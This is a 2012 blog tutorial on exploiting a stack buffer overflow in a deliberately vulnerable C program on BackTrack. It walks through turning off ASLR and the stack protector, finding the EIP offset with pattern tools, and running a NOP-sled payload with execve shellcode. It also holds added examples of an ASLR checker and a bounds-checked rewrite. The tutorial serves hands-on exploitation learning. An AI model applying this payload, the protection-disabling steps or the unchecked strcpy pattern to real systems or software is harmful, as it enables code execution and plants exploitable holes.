Friday, 24 February 2012

EXPLOITATION ON BACKTRACK R2 (Stack overflow)

1. Turn off Linux ASLR

root@justview:~# cat /proc/sys/kernel/randomize_va_space
root@justview:~# echo 0 > /proc/sys/kernel/randomize_va_space

The first command prints the current setting (2 on a stock kernel, meaning full randomization); the second sets it to 0, which disables ASLR until the next reboot.
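The sysctl the commands above toggle has three values, not two. As an added example (not from the original post, with function names of my own choosing), the following C program parses the file, reports what each level means, and exits non-zero unless full randomization is on, so it can be used afterwards to confirm ASLR was switched back on once the exercise is finished.

```c
/* Added example (not from the original post): checker for the
 * randomize_va_space sysctl that the tutorial turns off.
 * Function names (aslr_level, aslr_describe, read_aslr_level) are ours. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Parse the text of /proc/sys/kernel/randomize_va_space ("0\n", "1\n", "2\n").
 * Returns 0, 1 or 2, or -1 if the text is not one of those values. */
int aslr_level(const char *text)
{
    if (text == NULL) return -1;
    char *end;
    long v = strtol(text, &end, 10);
    if (end == text) return -1;                   /* no digits at all */
    while (*end == ' ' || *end == '\n') end++;    /* tolerate trailing newline */
    if (*end != '\0') return -1;                  /* junk after the number */
    if (v < 0 || v > 2) return -1;                /* kernel only defines 0..2 */
    return (int)v;
}

/* Human-readable meaning of each level (Linux kernel semantics). */
const char *aslr_describe(int level)
{
    switch (level) {
    case 0:  return "off: no randomization (exploitation exercise state)";
    case 1:  return "conservative: mmap base, stack and VDSO randomized, heap not";
    case 2:  return "full: mmap base, stack, VDSO and heap randomized";
    default: return "unknown value";
    }
}

/* Read the live setting. Returns -1 when the file cannot be read
 * (non-Linux host or no permission). */
int read_aslr_level(void)
{
    char buf[32];
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    if (f == NULL) return -1;
    if (fgets(buf, sizeof buf, f) == NULL) { fclose(f); return -1; }
    fclose(f);
    return aslr_level(buf);
}

int main(void)
{
    int level = read_aslr_level();
    printf("randomize_va_space = %d (%s)\n", level, aslr_describe(level));
    /* Non-zero exit unless ASLR is at full strength, so a script can gate on it. */
    return level == 2 ? 0 : 1;
}
```

Run it after `echo 2 > /proc/sys/kernel/randomize_va_space` at the end of the session; anything other than a zero exit status means the machine is still in the weakened state.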

2. Create the vulnerable application:

Open your editor and write this vulnerable program:


##############################
// I am a vulnerable thing.
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv)
{
    char buffer[500];          // fixed-size buffer on the stack
    if (argc < 2)              // one argument is required
        return 1;
    // Vulnerable function! strcpy has no bounds check: an argument longer
    // than 500 bytes runs past the buffer into the saved return address.
    strcpy(buffer, argv[1]);
    return 0;
}
##############################

After that, save it as vulnareble.c (the name used in the compile command below).
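For comparison, here is the same program with the copy bounded by the size of the destination. This is an added example, not part of the original post; the helper names bounded_copy and stored_length_of_repeated are my own. strcpy copies until it finds a NUL byte regardless of the buffer size, which is what lets a 600-byte argument run past the 500-byte buffer into the saved EIP; a bounded copy truncates and reports it instead.

```c
/* Added example (not from the original post): the tutorial's program with
 * the copy bounded by the destination size. Helper names are ours. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 500

/* Copy src into dst (capacity dst_size bytes), always NUL-terminating.
 * Returns 0 on success, -1 if src did not fit: the copy is truncated to
 * dst_size-1 bytes and nothing beyond the buffer is written. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    if (dst_size == 0) return -1;
    size_t len = strlen(src);
    if (len >= dst_size) {
        memcpy(dst, src, dst_size - 1);
        dst[dst_size - 1] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);
    return 0;
}

/* Build an n-byte run of c (constructed test input, like the 600 'A's in
 * the tutorial), copy it into a BUF_SIZE buffer with bounded_copy, and
 * return the length actually stored. */
size_t stored_length_of_repeated(char c, size_t n)
{
    char buffer[BUF_SIZE];
    char *input = malloc(n + 1);
    if (input == NULL) return 0;
    memset(input, c, n);
    input[n] = '\0';
    bounded_copy(buffer, sizeof buffer, input);
    size_t stored = strlen(buffer);
    free(input);
    return stored;
}

int main(int argc, char **argv)
{
    char buffer[BUF_SIZE];
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (bounded_copy(buffer, sizeof buffer, argv[1]) != 0)
        fprintf(stderr, "input truncated to %zu bytes\n", sizeof buffer - 1);
    printf("stored %zu bytes\n", strlen(buffer));
    return 0;
}
```

Running this build with the same 600-byte argument stores 499 bytes and prints the truncation warning rather than crashing; the stack protector and ASLR that the tutorial disables are the second and third layers behind this first one.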


3. Compile the application

(screenshot of the compiler output not preserved)

4. Run the application

Now run it under gdb and overwrite the buffer with 600 bytes of the character 0x41 ('A'):

(gdb) run $(python -c 'print "\x41" * 600')


After running it we do not see EIP overwritten, because gcc 3.x and 4.x by default compile code with a protection technique called "stack-smashing protection" (SSP): a canary value is placed before the saved return address and checked before the function returns, so the program aborts instead of returning into our data. This protection is enabled by default on all Linux operating systems.
That is why we must turn off SSP.

5. Turn off SSP

Open a new tab and recompile with the stack protector disabled (-mpreferred-stack-boundary=2 keeps the stack 4-byte aligned so the offsets stay predictable):

root@justview:~# gcc -ggdb -o vulnareble -fno-stack-protector -mpreferred-stack-boundary=2 vulnareble.c


6. Run the application again


root@justview:~# gdb vulnareble

Send your fuzzer again:

(gdb) run $(python -c 'print "\x41"*600')




We can see that we have successfully overwritten EIP with our 'A' characters (41414141). Next we create a unique pattern with pattern_create to generate a string of 600 characters.

7. Create the pattern



root@justview:/pentest/exploits/framework/tools# ./pattern_create.rb 600 > string_pattern.txt


Open the file with kwrite:



Then copy the characters into your fuzzer.

8. Use the 600-character pattern to find the offset to EIP


We get the value that landed in EIP at the crash (0x41387141), which tells us how many bytes it took to reach EIP.

9. Use pattern_offset to find the number of bytes

We learn that EIP is overwritten at 504 bytes. The next 4 bytes are what land in EIP, so that is where we will put the address of ESP: 508 bytes in total.

10. Change the fuzzer back

(gdb) run $(python -c 'print "\x41"*508')



Now we have successfully taken control of EIP and ESP.

11. Find the address of ESP



In this case we will use 323 bytes of junk plus a shellcode of 45 bytes = 368 bytes.
508 bytes - 368 bytes = 140 bytes.
So after the shellcode we still have 140 bytes; we divide 140 by 4 (the size of one memory address, e.g. \x41\x41\x41\x41) and get 35.

We get the address of ESP: 0xbffff16c.

Now open KCalc (the calculator) and, in hexadecimal mode, subtract 200 (the result is 0xbfffef6c, which written little-endian is the \x6c\xef\xff\xbf used in the fuzzer below):
0xbffff16c - 200


12. Generate shellcode
Download the shellcode generator here (link not preserved).



After we have the shellcode, change your fuzzer:


run $(python -c 'print "\x90" * 323 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x6c\xef\xff\xbf" * 35')
Starting program: /root/vulner $(python -c 'print "\x90" * 323 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x6c\xef\xff\xbf" * 35')

After you run it, this is the result:


If you see this condition, you must quit and run your fuzzer again.

Then try changing the fuzzer value to 370 and look at the result..



After changing the fuzzer value again to 301, I finally succeeded..


GOOD LUCK
Try Harder..